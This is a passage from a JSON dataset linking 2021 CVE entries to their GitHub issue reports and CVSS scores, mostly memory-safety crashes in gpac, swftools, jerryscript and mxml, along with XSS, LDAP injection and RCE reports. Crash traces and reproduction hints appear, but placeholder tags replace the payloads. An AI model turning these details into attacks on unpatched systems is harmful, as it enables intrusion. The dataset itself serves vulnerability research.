<incomplete sequence NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in 
__libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check whether the length of a buffer fit its actual size. APITAG",
  90580. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90581. "severity": "HIGH",
  90582. "baseScore": 7.8,
  90583. "impactScore": 5.9,
  90584. "exploitabilityScore": 1.8
  90585. },
  90586. {
  90587. "CVE_ID": "CVE-2021-40571",
  90588. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1895",
  90589. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1895",
  90590. "Repo_new": "gpac/gpac",
  90591. "Issue_Created_At": "2021-08-26T09:51:24Z",
  90592. "description": "Segmentation fault using mp4box in ilst_box_read, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG in ilst_box_read (s NUMBERTAG f NUMBERTAG bs NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG ff1fa in gf_isom_box_read (bs NUMBERTAG c NUMBERTAG a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  90593. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90594. "severity": "HIGH",
  90595. "baseScore": 7.8,
  90596. "impactScore": 5.9,
  90597. "exploitabilityScore": 1.8
  90598. },
  90599. {
  90600. "CVE_ID": "CVE-2021-40574",
  90601. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1897",
  90602. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1897",
  90603. "Repo_new": "gpac/gpac",
  90604. "Issue_Created_At": "2021-08-26T11:19:33Z",
  90605. "description": "System abort APITAG dumped) caused by buffer overflow using APITAG in gf_text_get_utf8_line. FILETAG (unzip first) This is the output of the program: ~~~~ stack smashing detected : APITAG terminated Aborted (core dumped) ~~~~ Here is the trace reported by gdb (the stack is smashed): ~~~~ Stopped reason: SIGABRT gef\u27a4 bt NUMBERTAG f NUMBERTAG d NUMBERTAG in raise NUMBERTAG f NUMBERTAG f3a in abort NUMBERTAG f NUMBERTAG ed6 in __libc_message NUMBERTAG f NUMBERTAG a NUMBERTAG in __fortify_fail NUMBERTAG f NUMBERTAG a3e in __stack_chk_fail NUMBERTAG f3ad in gf_text_get_utf8_line APITAG out>, APITAG out>, txt_in=<optimized out>, unicode_type NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG c3a5c NUMBERTAG e in NUMBERTAG bcc NUMBERTAG fc NUMBERTAG in NUMBERTAG e NUMBERTAG c3aac3 in NUMBERTAG ec3a0c3a7c NUMBERTAG e in NUMBERTAG bdcd NUMBERTAG a5c3 in NUMBERTAG ac NUMBERTAG e in gf_isom_load_extra_boxes (movie NUMBERTAG c NUMBERTAG f NUMBERTAG c NUMBERTAG aacc2, moov_boxes=<optimized out>, moov_boxes_size=<optimized out>, udta_only=(unknown NUMBERTAG at PATHTAG NUMBERTAG in ?? () ~~~~",
  90606. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90607. "severity": "HIGH",
  90608. "baseScore": 7.8,
  90609. "impactScore": 5.9,
  90610. "exploitabilityScore": 1.8
  90611. },
  90612. {
  90613. "CVE_ID": "CVE-2021-40575",
  90614. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1905",
  90615. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1905",
  90616. "Repo_new": "gpac/gpac",
  90617. "Issue_Created_At": "2021-09-01T06:02:21Z",
  90618. "description": "Segmentation fault casued by null pointer dereference using mp4box in mpgviddmx_process, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG a NUMBERTAG in memcpy (__len NUMBERTAG ffffffffffffffff, __src NUMBERTAG ada NUMBERTAG dest NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG mpgviddmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe3e NUMBERTAG in gf_filter_process_task (task NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG f7ab NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG b8 in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG c8b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG in generic_start_main NUMBERTAG f NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ Here is the trace reported by ASAN NUMBERTAG ERROR: APITAG negative size param: (size NUMBERTAG fdaf NUMBERTAG ff NUMBERTAG PATHTAG NUMBERTAG fdaf NUMBERTAG f1c in memcpy PATHTAG NUMBERTAG fdaf NUMBERTAG f1c in mpgviddmx_process PATHTAG NUMBERTAG fdaf NUMBERTAG efa0 in gf_filter_process_task PATHTAG NUMBERTAG fdaf NUMBERTAG f0e2 in gf_fs_thread_proc PATHTAG NUMBERTAG fdaf NUMBERTAG fb0 in gf_fs_run PATHTAG NUMBERTAG fdaf1ff NUMBERTAG f5 in gf_media_import PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG f in convert_file_info PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaef9a6bf6 in __libc_start_main ( PATHTAG NUMBERTAG ce NUMBERTAG be NUMBERTAG f9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fdaf NUMBERTAG b NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG fdaf NUMBERTAG a NUMBERTAG in filein_initialize PATHTAG NUMBERTAG fdaf NUMBERTAG b0f0 in gf_filter_new_finalize PATHTAG 
NUMBERTAG fdaf NUMBERTAG f NUMBERTAG in gf_filter_new PATHTAG NUMBERTAG fdaf NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaf NUMBERTAG a NUMBERTAG in gf_fs_load_source PATHTAG NUMBERTAG fdaf1ff NUMBERTAG a6 in gf_media_import PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG f in convert_file_info PATHTAG NUMBERTAG ce NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG fdaef9a6bf6 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG negative size param ( PATHTAG NUMBERTAG ABORTING ~~~~",
  90619. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90620. "severity": "MEDIUM",
  90621. "baseScore": 5.5,
  90622. "impactScore": 3.6,
  90623. "exploitabilityScore": 1.8
  90624. },
  90625. {
  90626. "CVE_ID": "CVE-2021-40609",
  90627. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1894",
  90628. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1894",
  90629. "Repo_new": "gpac/gpac",
  90630. "Issue_Created_At": "2021-08-26T04:44:12Z",
  90631. "description": "heap buffer overflow in MP4BOX at source file PATHTAG FILETAG",
  90632. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90633. "severity": "MEDIUM",
  90634. "baseScore": 5.5,
  90635. "impactScore": 3.6,
  90636. "exploitabilityScore": 1.8
  90637. },
  90638. {
  90639. "CVE_ID": "CVE-2021-41131",
  90640. "Issue_Url_old": "https://github.com/theupdateframework/python-tuf/issues/1527",
  90641. "Issue_Url_new": "https://github.com/theupdateframework/python-tuf/issues/1527",
  90642. "Repo_new": "theupdateframework/python-tuf",
  90643. "Issue_Created_At": "2021-08-20T18:14:23Z",
  90644. "description": "Metadata API: Delegation role names validation. Description of issue or feature request : Delegation role names are not restricted in any way in the spec, but they are targets metadata role names. They could be APITAG , APITAG or APITAG . The problem is that at some point those delegation role names are used when constructing a URL used to download the delegated target metadata file: URLTAG which is likely to be a problem. Current behavior : No validation is performed on Delegation role names. Expected behavior : Escape special symbols like APITAG or APITAG .",
  90645. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H",
  90646. "severity": "HIGH",
  90647. "baseScore": 8.7,
  90648. "impactScore": 5.8,
  90649. "exploitabilityScore": 2.2
  90650. },
  90651. {
  90652. "CVE_ID": "CVE-2021-41232",
  90653. "Issue_Url_old": "https://github.com/github/securitylab/issues/464",
  90654. "Issue_Url_new": "https://github.com/github/securitylab/issues/464",
  90655. "Repo_new": "github/securitylab",
  90656. "Issue_Created_At": "2021-10-29T07:59:45Z",
  90657. "description": "GO]: [ CVETAG : LDAP Injection All For One]. Query Relevant PR: URLTAG Report Constructing LDAP names or search filters directly from tainted data enables attackers to inject specially crafted values that changes the initial meaning of the name or filter itself. Successful LDAP injections attacks can read, modify or delete sensitive information from the directory service. This query identifies cases in which a LDAP query executes user provided input without being sanitized before. [x] Are you planning to discuss this vulnerability submission publicly? APITAG Post, social networks, etc). We would love to have you spread the word about the good work you are doing Result(s) Provide at least one useful result found by your query, on some revision of a real project. [go real world web URLTAG",
  90658. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90659. "severity": "CRITICAL",
  90660. "baseScore": 9.8,
  90661. "impactScore": 5.9,
  90662. "exploitabilityScore": 3.9
  90663. },
  90664. {
  90665. "CVE_ID": "CVE-2021-41241",
  90666. "Issue_Url_old": "https://github.com/nextcloud/groupfolders/issues/1692",
  90667. "Issue_Url_new": "https://github.com/nextcloud/groupfolders/issues/1692",
  90668. "Repo_new": "nextcloud/groupfolders",
  90669. "Issue_Created_At": "2021-10-11T13:47:33Z",
  90670. "description": "Groupfolders for which a user has no reading rights APITAG Permissions) can still be copied and read out!. Example: Employee list / NC users: MA1 site manager MA2 accountant MA3 project employee Lisa MA4 project employee Hans NC folder structure (group folder): Group folder company location Berlin ...\u251c\u2500\u2500 Administration ..........\u251c\u2500\u2500 accounting ...\u251c\u2500\u2500 projects ..........\u251c\u2500\u2500 Project A ..........\u251c\u2500\u2500 Project B The following should be set via APITAG Permissions\u201d: Write and read rights to all folders should have: MA1 site manager Write and read rights to accounting folders should have: only MA2 accountant Write and read rights to project folder A should have: only MA3 project employee Lisa Write and read rights to project folder B should have: only MA4 project employee Hans All of this is easy to set using the APITAG Permissions\u201d in the APITAG However\u2026 For the root folder APITAG folder company location Berlin\u201d, all NC users must have at least reading rights, otherwise you won\u2019t see a folder at all\u2026 \u201cMA4 Projektmitarbeiter Hans\u201d does not initially see the APITAG Accounting\u201d folder. However, if he copies the complete root directory APITAG folder company location Berlin\u201d and inserts it into another of his own folders, all directories and their contents are visible to him. Can this copying of the \u201cinvisible\u201d folder or in general be prevented somehow? How would you solve this problem? Thank\u2019s for the Tipps. Matthias",
  90671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  90672. "severity": "MEDIUM",
  90673. "baseScore": 4.3,
  90674. "impactScore": 1.4,
  90675. "exploitabilityScore": 2.8
  90676. },
  90677. {
  90678. "CVE_ID": "CVE-2021-41392",
  90679. "Issue_Url_old": "https://github.com/BoostIO/BoostNote-App/issues/856",
  90680. "Issue_Url_new": "https://github.com/boostio/boostnote-app/issues/856",
  90681. "Repo_new": "boostio/boostnote-app",
  90682. "Issue_Created_At": "2021-03-09T15:02:25Z",
  90683. "description": "Potential Command Execution vulnerabilities introduced by FILETAG . Hi, We found that APITAG introduces the dangerous API APITAG for arbitrary access from an unsafe renderer process. This may lead to remote command execution. We suggest that a URL check enforcing an allowlist of trusted URLs be added at L NUMBERTAG . URLTAG",
  90684. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90685. "severity": "CRITICAL",
  90686. "baseScore": 9.8,
  90687. "impactScore": 5.9,
  90688. "exploitabilityScore": 3.9
  90689. },
  90690. {
  90691. "CVE_ID": "CVE-2021-41571",
  90692. "Issue_Url_old": "https://github.com/apache/pulsar/issues/11814",
  90693. "Issue_Url_new": "https://github.com/apache/pulsar/issues/11814",
  90694. "Repo_new": "apache/pulsar",
  90695. "Issue_Created_At": "2021-08-27T07:58:36Z",
  90696. "description": "FILETAG",
  90697. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  90698. "severity": "MEDIUM",
  90699. "baseScore": 6.5,
  90700. "impactScore": 3.6,
  90701. "exploitabilityScore": 2.8
  90702. },
  90703. {
  90704. "CVE_ID": "CVE-2021-42054",
  90705. "Issue_Url_old": "https://github.com/xebd/accel-ppp/issues/156",
  90706. "Issue_Url_new": "https://github.com/xebd/accel-ppp/issues/156",
  90707. "Repo_new": "xebd/accel-ppp",
  90708. "Issue_Created_At": "2021-10-06T09:29:07Z",
  90709. "description": "The stack buffer underflow bug can be triggered even by remote client. Using version APITAG . The issue NUMBERTAG can be triggered even by remote client. Steps to reproduce NUMBERTAG Build access ppp: CODETAG NUMBERTAG Run APITAG , use pptp server: APITAG The running configuration APITAG is: ERRORTAG use APITAG and the APITAG is as follows: APITAG NUMBERTAG Install pptp client: APITAG NUMBERTAG Run the client: APITAG APITAG we need to follow the forked subprocesses and control them, therefore we used the APITAG to execute the pptp client instead of simply using APITAG NUMBERTAG Kill ( APITAG ) the client after authentication succeeded. Then the APITAG will crash due to ERRORTAG . ERRORTAG The detailed log of APITAG is shown in FILETAG .",
  90710. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90711. "severity": "HIGH",
  90712. "baseScore": 7.5,
  90713. "impactScore": 3.6,
  90714. "exploitabilityScore": 3.9
  90715. },
  90716. {
  90717. "CVE_ID": "CVE-2021-42203",
  90718. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/176",
  90719. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/176",
  90720. "Repo_new": "matthiaskramm/swftools",
  90721. "Issue_Created_At": "2021-10-07T13:21:58Z",
  90722. "description": "heap use after free exists in the function APITAG in swftext.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG d6a0 at pc NUMBERTAG d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG d6a0 thread T NUMBERTAG c in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c2dc in fontcallback2 PATHTAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG d6a0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ffff6f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG db2c in APITAG PATHTAG NUMBERTAG PATHTAG ) previously allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG c in rfx_calloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap use after free APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c0c7fff9a NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9a NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9aa0: fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ab NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ac NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9ad0: fa fa fa fa[fd]fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c0c7fff9ae NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9af NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9b NUMBERTAG fa fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap 
right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
  90723. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90724. "severity": "HIGH",
  90725. "baseScore": 7.8,
  90726. "impactScore": 5.9,
  90727. "exploitabilityScore": 1.8
  90728. },
  90729. {
  90730. "CVE_ID": "CVE-2021-42218",
  90731. "Issue_Url_old": "https://github.com/ompl/ompl/issues/839",
  90732. "Issue_Url_new": "https://github.com/ompl/ompl/issues/839",
  90733. "Repo_new": "ompl/ompl",
  90734. "Issue_Created_At": "2021-10-07T07:30:39Z",
  90735. "description": "A memory leak in VFRRT. When I\u2019m testing ompl, a memory leak occurred. After locating it, we found that the error is caused by the following code in APITAG FILETAG In line NUMBERTAG a motion object was requested with its constructor, which also allocates a new state in that motion. But in line NUMBERTAG the state in motion was assigned. The space allocated in the constructor becomes a wild APITAG which is why memory leaks. We suggest using the default constructor in line APITAG that: FILETAG I did my experiment on Ubuntu NUMBERTAG",
  90736. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90737. "severity": "HIGH",
  90738. "baseScore": 7.5,
  90739. "impactScore": 3.6,
  90740. "exploitabilityScore": 3.9
  90741. },
  90742. {
  90743. "CVE_ID": "CVE-2021-4229",
  90744. "Issue_Url_old": "https://github.com/faisalman/ua-parser-js/issues/536",
  90745. "Issue_Url_new": "https://github.com/faisalman/ua-parser-js/issues/536",
  90746. "Repo_new": "faisalman/ua-parser-js",
  90747. "Issue_Created_At": "2021-10-22T13:46:48Z",
  90748. "description": "Security issue: compromised npm packages of ua parser js NUMBERTAG Questions about deprecated npm package ua parser js. Hi! See a warning at npm URLTAG APITAG First question: Can we use range APITAG , or is it not safe? Second question: Will you create a new package, or try to remove hijacked versions and continue updating this package?",
  90749. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90750. "severity": "HIGH",
  90751. "baseScore": 8.8,
  90752. "impactScore": 5.9,
  90753. "exploitabilityScore": 2.8
  90754. },
  90755. {
  90756. "CVE_ID": "CVE-2021-42342",
  90757. "Issue_Url_old": "https://github.com/embedthis/goahead/issues/305",
  90758. "Issue_Url_new": "https://github.com/embedthis/goahead/issues/305",
  90759. "Repo_new": "embedthis/goahead",
  90760. "Issue_Created_At": "2021-10-12T00:50:25Z",
  90761. "description": "Upload form vars bypass CGI prefixing.. Summary A security vulnerability exists with the file upload filter where user form variables can be passed to CGI scripts without being prefixed with the CGI prefix. Detail The upload filter accepts uploaded files with optional user form variables. When used with the CGI handler, these form variables are passed as O/S process environment variables. Form variables in Post requests are prefixed using the ME_GOAHEAD_CGI_VAR_PREFIX which is typically set to CGI_. However, the upload filter is not setting the untrusted var bit and so the CGI handler does not use the prefix. Threat Scope and Mitigation For users who have the upload filter configured and the CGI handler configured, the vulnerability can be used to perform remote code execution. CVE Pending. Remedy Deploy APITAG NUMBERTAG Credit Thanks to William Bowling at URLTAG and confirmed and extended by Zup. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  90762. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90763. "severity": "CRITICAL",
  90764. "baseScore": 9.8,
  90765. "impactScore": 5.9,
  90766. "exploitabilityScore": 3.9
  90767. },
  90768. {
  90769. "CVE_ID": "CVE-2021-42584",
  90770. "Issue_Url_old": "https://github.com/convos-chat/convos/issues/623",
  90771. "Issue_Url_new": "https://github.com/convos-chat/convos/issues/623",
  90772. "Repo_new": "convos-chat/convos",
  90773. "Issue_Created_At": "2021-10-12T19:56:57Z",
  90774. "description": "Vulnerability in URLTAG I have identified a stored cross-site scripting vulnerability in URLTAG ; below is the POC for your reference: POC: APITAG by jberger) Reference Link: URLTAG",
  90775. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  90776. "severity": "MEDIUM",
  90777. "baseScore": 5.4,
  90778. "impactScore": 2.7,
  90779. "exploitabilityScore": 2.3
  90780. },
  90781. {
  90782. "CVE_ID": "CVE-2021-42648",
  90783. "Issue_Url_old": "https://github.com/cdr/code-server/issues/4355",
  90784. "Issue_Url_new": "https://github.com/coder/code-server/issues/4355",
  90785. "Repo_new": "coder/code-server",
  90786. "Issue_Created_At": "2021-10-14T08:16:39Z",
  90787. "description": "Cross Site Scripting\uff08XSS\uff09vulnerability in code server. APITAG APITAG Information Web Browser: firefox Local OS: Debian Remote OS: Debian Remote Architecture: APITAG NUMBERTAG Steps to Reproduce APITAG your browser and insert payload APITAG NUMBERTAG example: APITAG APITAG APITAG Screenshot FILETAG APITAG Notes APITAG This issue can be reproduced in VS Code: Yes",
  90788. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  90789. "severity": "MEDIUM",
  90790. "baseScore": 6.1,
  90791. "impactScore": 2.7,
  90792. "exploitabilityScore": 2.8
  90793. },
  90794. {
  90795. "CVE_ID": "CVE-2021-42859",
  90796. "Issue_Url_old": "https://github.com/michaelrsweet/mxml/issues/286",
  90797. "Issue_Url_new": "https://github.com/michaelrsweet/mxml/issues/286",
  90798. "Repo_new": "michaelrsweet/mxml",
  90799. "Issue_Created_At": "2021-10-15T03:56:39Z",
  90800. "description": "stack buffer overflow and heap buffer overflow. Hi, We have used Mini xml in our project, so I test NUMBERTAG and master branch and found something: Fisrt, there are some memory leaks in NUMBERTAG and master: ERRORTAG and : this is your testmxml.c: ERRORTAG also ,we I input an unformed string to APITAG there will be a stack buffer overflow and heap buffer overflow. I think if you add a longth check in mxml_string_getc when every pointer change(\"like ( s)++\"), will be better? Of course Maybe I have use it in a wrong . you can check it here: this is my testcase: CODETAG you can compile your lib with CFLAGS =+ \" g O0 fno omit frame pointer gline tables only fsanitize=address fsanitize address use after scope fsanitize=fuzzer no link\" and LDFLAGS =+\" fsanitize=fuzzer no link fsanitize=address\" and clang++ g O1 fno omit frame pointer gline tables only fsanitize=address fsanitize address use after scope fsanitize=fuzzer no link mxml_fuzzer.cpp I ./ fsanitize=fuzzer ./libmxml.a run and these are the backtrace: ERRORTAG ERRORTAG",
  90801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90802. "severity": "HIGH",
  90803. "baseScore": 7.5,
  90804. "impactScore": 3.6,
  90805. "exploitabilityScore": 3.9
  90806. },
  90807. {
  90808. "CVE_ID": "CVE-2021-42863",
  90809. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4793",
  90810. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4793",
  90811. "Repo_new": "jerryscript-project/jerryscript",
  90812. "Issue_Created_At": "2021-10-13T02:35:23Z",
  90813. "description": "Buffer overflow in ecma builtin typedarray prototype.c. APITAG revision d NUMBERTAG e7 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ICE: Assertion 'object_p >type_flags_refs >= ECMA_OBJECT_REF_ONE' failed at PATHTAG (ecma_deref_object NUMBERTAG Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) Backtrace NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG in __GI_abort () at APITAG NUMBERTAG in jerry_port_fatal APITAG at PATHTAG NUMBERTAG fccb4a in jerry_fatal APITAG at PATHTAG NUMBERTAG fccba0 in jerry_assert_fail (assertion NUMBERTAG db0 \"object_p >type_flags_refs >= ECMA_OBJECT_REF_ONE\", file NUMBERTAG d NUMBERTAG PATHTAG function NUMBERTAG a NUMBERTAG APITAG \"ecma_deref_object\", line NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG in ecma_deref_object (object_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG in ecma_free_value (value NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in ecma_fast_free_value (value NUMBERTAG at PATHTAG NUMBERTAG fea NUMBERTAG in opfunc_call (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ff5e4b in vm_execute (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ff NUMBERTAG ea in vm_run (shared_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG a0, this_binding_value NUMBERTAG lex_env_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG fb NUMBERTAG in ecma_op_function_call_simple (func_obj_p NUMBERTAG b NUMBERTAG APITAG , this_arg_value NUMBERTAG APITAG arguments_list_len NUMBERTAG at PATHTAG NUMBERTAG fb1a NUMBERTAG in ecma_op_function_call (func_obj_p NUMBERTAG b NUMBERTAG APITAG , this_arg_value NUMBERTAG APITAG arguments_list_len NUMBERTAG at PATHTAG NUMBERTAG fea4a9 in opfunc_call (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG d0) at PATHTAG NUMBERTAG ff5e4b in vm_execute (frame_ctx_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG d0) at PATHTAG 
NUMBERTAG ff NUMBERTAG ea in vm_run (shared_p NUMBERTAG ffcb NUMBERTAG d NUMBERTAG e0, this_binding_value NUMBERTAG lex_env_p NUMBERTAG b NUMBERTAG APITAG ) at PATHTAG NUMBERTAG fe NUMBERTAG c1 in vm_run_global (bytecode_p NUMBERTAG b6a8 APITAG , APITAG APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG in jerry_run (func_val NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG ffcb NUMBERTAG d NUMBERTAG c8) at PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG b3 in __libc_start_main (main NUMBERTAG f NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG ffcb NUMBERTAG d NUMBERTAG c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffcb NUMBERTAG d NUMBERTAG b8) at PATHTAG NUMBERTAG f NUMBERTAG ce in _start () Expected behavior APITAG in ecma builtin typearray APITAG should check type of the array give backed by filter. We have already made this crash an arbitrary read/write, if you need that APITAG please contact us.",
  90814. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90815. "severity": "CRITICAL",
  90816. "baseScore": 9.8,
  90817. "impactScore": 5.9,
  90818. "exploitabilityScore": 3.9
  90819. },
  90820. {
  90821. "CVE_ID": "CVE-2021-42917",
  90822. "Issue_Url_old": "https://github.com/xbmc/xbmc/issues/20305",
  90823. "Issue_Url_new": "https://github.com/xbmc/xbmc/issues/20305",
  90824. "Repo_new": "xbmc/xbmc",
  90825. "Issue_Created_At": "2021-10-12T06:07:43Z",
